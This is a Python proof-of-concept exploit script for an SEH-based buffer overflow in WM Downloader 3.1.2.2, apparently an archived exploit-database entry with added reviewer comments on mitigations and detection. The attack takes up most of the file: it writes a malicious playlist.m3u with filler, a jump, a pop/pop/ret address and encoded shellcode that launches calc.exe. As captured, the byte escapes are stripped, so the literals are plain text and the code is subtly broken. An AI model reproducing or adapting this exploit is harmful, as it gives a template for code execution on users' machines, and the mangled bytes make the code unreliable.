# Title : WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Published : 2010-07-28
# Author : fdisk
#!/usr/bin/python
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Date: 2010-07-28
# Author: fdisk
# Version: 3.1.2.2 2010.04.15
# Tested on Windows XP SP3 en
# Proof-of-concept generator: concatenates one long string and writes it to
# "playlist.m3u". Per the header above, the affected product is WM Downloader
# 3.1.2.2 (2010.04.15) and the bug class is a buffer overflow that reaches the
# structured exception handler (SEH) chain; tested by the author on XP SP3.
# NOTE(review): the escape backslashes appear to have been lost when this page
# was captured. As shown, the literals are plain text ("x41"), not byte
# escapes, so the byte counts in the comments reflect the author's intent only.
# Defender view: the resulting playlist is a single line of more than 43 KB
# with no path or URL structure, which is a workable content signature for
# mail/web gateways and endpoint scanning of .m3u files.

# Filler repeated 43485 times. Presumably the distance from the start of the
# vulnerable buffer to the exception registration record on the tested build;
# this cannot be verified from the page.
payload = "x41" * 43485
payload += "xebx16x90x90" # jump (author's label; presumably fills the next-handler field - TODO confirm)
# "ppr" is presumably pop/pop/ret: an address inside WDCodec00.dll used as the
# overwritten handler. The approach depends on a module at a predictable
# address that is not SafeSEH-protected; SEHOP, SafeSEH and ASLR are the usual
# mitigations for this pattern.
payload += "xb4x15xbbx01" # ppr - WDCodec00.dll
# 16 repeats of padding between the handler record and the encoded payload.
payload += "x90" * 16
# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=thread, CMD=calc.exe
# (author's description: a demonstration payload that launches calc.exe,
# i.e. proof of code execution rather than a weaponised action)
payload += ("xdbxdfxd9x74x24xf4x58x2bxc9xb1x33xbax4cxa8x75"
"x76x83xc0x04x31x50x13x03x1cxbbx97x83x60x53xde"
"x6cx98xa4x81xe5x7dx95x93x92xf6x84x23xd0x5ax25"
"xcfxb4x4exbexbdx10x61x77x0bx47x4cx88xbdx47x02"
"x4axdfx3bx58x9fx3fx05x93xd2x3ex42xc9x1dx12x1b"
"x86x8cx83x28xdax0cxa5xfex51x2cxddx7bxa5xd9x57"
"x85xf5x72xe3xcdxedxf9xabxedx0cx2dxa8xd2x47x5a"
"x1bxa0x56x8ax55x49x69xf2x3ax74x46xffx43xb0x60"
"xe0x31xcax93x9dx41x09xeex79xc7x8cx48x09x7fx75"
"x69xdexe6xfex65xabx6dx58x69x2axa1xd2x95xa7x44"
"x35x1cxf3x62x91x45xa7x0bx80x23x06x33xd2x8bxf7"
"x91x98x39xe3xa0xc2x57xf2x21x79x1exf4x39x82x30"
"x9dx08x09xdfxdax94xd8xa4x05x77xc9xd0xadx2ex98"
"x59xb0xd0x76x9dxcdx52x73x5dx2ax4axf6x58x76xcc"
"xeax10xe7xb9x0cx87x08xe8x6ex46x9bx70x5fxedx1b"
"x12x9f")
# 16 repeats of trailing padding after the encoded payload.
payload += "x90" * 16
# Write the string to playlist.m3u in the current directory (text mode "w").
# The name `file` shadows the Python 2 builtin, and the handle is closed
# explicitly, so it stays open if write() raises.
file = open("playlist.m3u", "w")
file.write(payload)
file.close()
# Python 2 print statement; the message text is kept as the author wrote it.
print "m3u file generated successfuly"